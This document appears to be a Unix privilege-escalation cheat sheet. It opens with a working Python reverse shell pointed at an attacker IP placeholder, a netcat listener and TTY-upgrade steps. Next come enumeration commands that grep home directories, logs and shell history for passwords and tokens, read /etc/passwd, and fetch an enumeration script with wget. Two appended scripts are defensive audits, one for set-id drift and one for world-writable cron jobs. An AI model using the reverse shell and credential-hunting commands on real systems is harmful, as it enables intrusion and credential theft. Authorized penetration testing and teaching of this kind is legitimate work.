This document provides a guide to privilege escalation and post-exploitation enumeration on Unix-like operating systems. It includes basic and advanced techniques to help identify and exploit potential vectors for escalating privileges. Many of the binaries these checks surface (SUID files, sudo rules, capabilities) can be cross-referenced against GTFOBins.
- Python Reverse Shell & Netcat Listener
- Upgrading to a TTY Shell via Python
- Basic Post-Exploitation Enumeration Commands
- Advanced Privilege Escalation Techniques
- Using Automated Tools for Enumeration
A reverse shell connects a compromised machine to an attacker's IP for remote command execution. A Netcat listener waits on a specified port to receive incoming connections.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.x.y",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);import pty;pty.spawn("/bin/bash")'
nc -nvlp 4444
A TTY shell gives the session job control, tab completion and proper handling of interactive programs. Run the first three commands inside the reverse shell, background it with Ctrl-Z, run the stty/fg/reset line in your local terminal, then set the terminal size from the restored shell:
python3 -c 'import pty;pty.spawn("/bin/bash")'
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
export TERM=xterm-256color
stty raw -echo; fg; reset
stty columns 200 rows 200
These commands help identify sensitive information and potential privilege escalation vectors:
find /home/ -type f -exec ls -lsha {} + | grep -E -i 'secret|token|key|api|password|username|db_password|mysql_password|mysql_user|databasepassword|mysql_root_password|credentials|creds|pass'
find / -perm -4000 -type f 2>/dev/null
find / -perm -2000 -type f 2>/dev/null
getcap -r / 2>/dev/null
ls -la /etc/passwd && ls -la /etc/shadow && cat /etc/passwd
cat /etc/crontab && ls -al /etc/cron.* && crontab -l && ls -al /var/spool/cron/crontabs
cd /home && grep -rnH "password"
sudo -l
cat /var/log/* 2>/dev/null | grep -i 'password\|token\|key'
env
cat ~/.bash_history
whoami && id && hostname
find / -writable -type f 2>/dev/null
find / -writable -type d 2>/dev/null
echo $PATH | tr ':' '\n' | xargs -I {} find {} -type f -executable 2>/dev/null
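The SUID/SGID listings above are most useful when compared against a known-good state rather than read raw. The following script is an added example (not part of the original guide) that treats the set-id file list as a baseline and reports any set-id file that is not on it. It assumes a find(1) that accepts octal -perm masks (GNU and BSD both do); the directory tree and baseline it builds are constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not part of the original guide: detect set-id drift by comparing
# the setuid/setgid files under a tree against an approved baseline list.
# Assumes a find(1) that accepts -perm with octal masks (GNU and BSD both do).
# The directory tree and baseline below are constructed for the demonstration.

# list_setid_files DIR -> sorted paths of regular files with the setuid or setgid bit
list_setid_files() {
    find "$1" -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null | sort
}

# unexpected_setid_files DIR BASELINE -> set-id files under DIR that are not listed
# (one exact path per line) in BASELINE. Empty output means no drift from the baseline.
unexpected_setid_files() {
    tree=$1
    baseline=$2
    list_setid_files "$tree" | while IFS= read -r path; do
        grep -qxF "$path" "$baseline" || printf '%s\n' "$path"
    done
}

# build_fixture -> creates a constructed tree with one approved and one rogue
# set-id file plus a baseline that lists only the approved one; prints the root
build_fixture() {
    root=$(mktemp -d)
    mkdir -p "$root/bin" "$root/opt"
    printf '#!/bin/sh\n' > "$root/bin/passwd"    # approved, listed in the baseline
    printf '#!/bin/sh\n' > "$root/opt/helper"    # rogue set-id file, not in the baseline
    printf '#!/bin/sh\n' > "$root/bin/ls"        # ordinary binary, no set-id bit
    chmod 4755 "$root/bin/passwd" "$root/opt/helper"
    chmod 0755 "$root/bin/ls"
    printf '%s\n' "$root/bin/passwd" > "$root/baseline.txt"
    printf '%s\n' "$root"
}

# Demo on the constructed tree. In practice the baseline is generated on a
# known-good host with list_setid_files / > baseline.txt and the check is
# re-run periodically so new set-id files show up as drift.
demo_root=$(build_fixture)
echo "Set-id files not in baseline:"
unexpected_setid_files "$demo_root" "$demo_root/baseline.txt"
rm -rf "$demo_root"
```

Running the block prints only the rogue `opt/helper` path; the approved `bin/passwd` is silent because it matches a baseline line exactly, and `bin/ls` never appears because it carries no set-id bit.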
These techniques delve deeper into identifying and exploiting privilege escalation opportunities:
- Network Configuration:
netstat -tuln
- Checking Installed Software for Debian-based systems:
dpkg -l
- Checking Installed Software for RPM-based systems:
rpm -qa
- Checking Kernel Version:
uname -r
- Finding Writable Binaries:
find / -perm -222 -type f 2>/dev/null
- File Integrity and Monitoring:
find / -type f -mtime -7 2>/dev/null
- Using Automated Tools for Enumeration:
wget https://linpeas.sh/ -O linpeas.sh && chmod +x linpeas.sh
- For macOS:
ls -la /private/var/log
- For Containers:
docker inspect <container_id>
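The writable-binary and cron checks above become a concrete finding when a scheduled job runs a program that unprivileged users can modify. The script below is an added example (not part of the original guide) that parses an /etc/crontab-style file and flags every job whose program, or whose parent directory, is world-writable. It assumes the system crontab layout (five time fields, user, command) and a find(1) that accepts -maxdepth; the crontab and files it creates are constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not part of the original guide: audit a system crontab for jobs
# whose program is world-writable, or sits in a world-writable directory, so that
# an unprivileged user could change what root executes on schedule.
# Assumes the /etc/crontab layout (five time fields, user, command) and a find(1)
# that accepts -maxdepth; the crontab and files below are constructed for the demo.

# parse_crontab FILE -> "user program" per job, skipping comments, blank lines
# and environment assignments; handles both the 5-field and the @reboot-style form
parse_crontab() {
    awk '
        /^[ \t]*#/  { next }                    # comment
        /^[ \t]*$/  { next }                    # blank line
        $1 ~ /=/    { next }                    # SHELL=, PATH=, MAILTO= assignments
        $1 ~ /^@/   { print $2, $3; next }      # @reboot user command
        NF >= 7     { print $6, $7 }            # min hour dom mon dow user command
    ' "$1"
}

# world_writable PATH -> succeeds if PATH or its parent directory has the o+w bit.
# A script executed out of a world-writable directory such as /tmp is flagged
# too, sticky bit or not, because its owner can rewrite it at any time.
world_writable() {
    [ -n "$(find "$1" -maxdepth 0 -perm -002 2>/dev/null)" ] && return 0
    [ -n "$(find "$(dirname "$1")" -maxdepth 0 -perm -002 2>/dev/null)" ] && return 0
    return 1
}

# audit_crontab FILE -> "user program" for each job whose program is exposed
audit_crontab() {
    parse_crontab "$1" | while read -r user program; do
        if world_writable "$program"; then
            printf '%s %s\n' "$user" "$program"
        fi
    done
}

# build_cron_fixture -> constructed tree with three jobs: one safe, one with a
# world-writable script, one with a script in a world-writable directory; prints root
build_cron_fixture() {
    root=$(mktemp -d)
    mkdir -p "$root/usr/local/bin" "$root/opt/backup" "$root/tmp"
    chmod 0755 "$root/usr/local/bin" "$root/opt/backup"   # explicit, independent of umask
    printf '#!/bin/sh\n' > "$root/usr/local/bin/rotate.sh"
    printf '#!/bin/sh\n' > "$root/opt/backup/run.sh"
    printf '#!/bin/sh\n' > "$root/tmp/cleanup.sh"
    chmod 0755 "$root/usr/local/bin/rotate.sh" "$root/tmp/cleanup.sh"
    chmod 0777 "$root/opt/backup/run.sh"                  # world-writable script
    chmod 1777 "$root/tmp"                                # world-writable (sticky) directory
    cat > "$root/crontab" <<EOF
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
0 2 * * * root $root/usr/local/bin/rotate.sh
*/5 * * * * root $root/opt/backup/run.sh --quiet
@reboot root $root/tmp/cleanup.sh
EOF
    printf '%s\n' "$root"
}

# Demo on the constructed crontab: only the two exposed jobs are reported.
demo_root=$(build_cron_fixture)
echo "Cron jobs whose program is world-writable or in a world-writable directory:"
audit_crontab "$demo_root/crontab"
rm -rf "$demo_root"
```

To run it against a real host, call `audit_crontab /etc/crontab` and repeat for the files under /etc/cron.d; per-user crontabs in /var/spool/cron lack the user column, so they would need a six-field variant of `parse_crontab`. The fix for anything reported is to move the script to a root-owned, mode 0755 location and drop the o+w bit on its directory.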
This guide is intended for educational and authorized security testing purposes only. Please always make sure you have explicit permission before conducting any security assessments.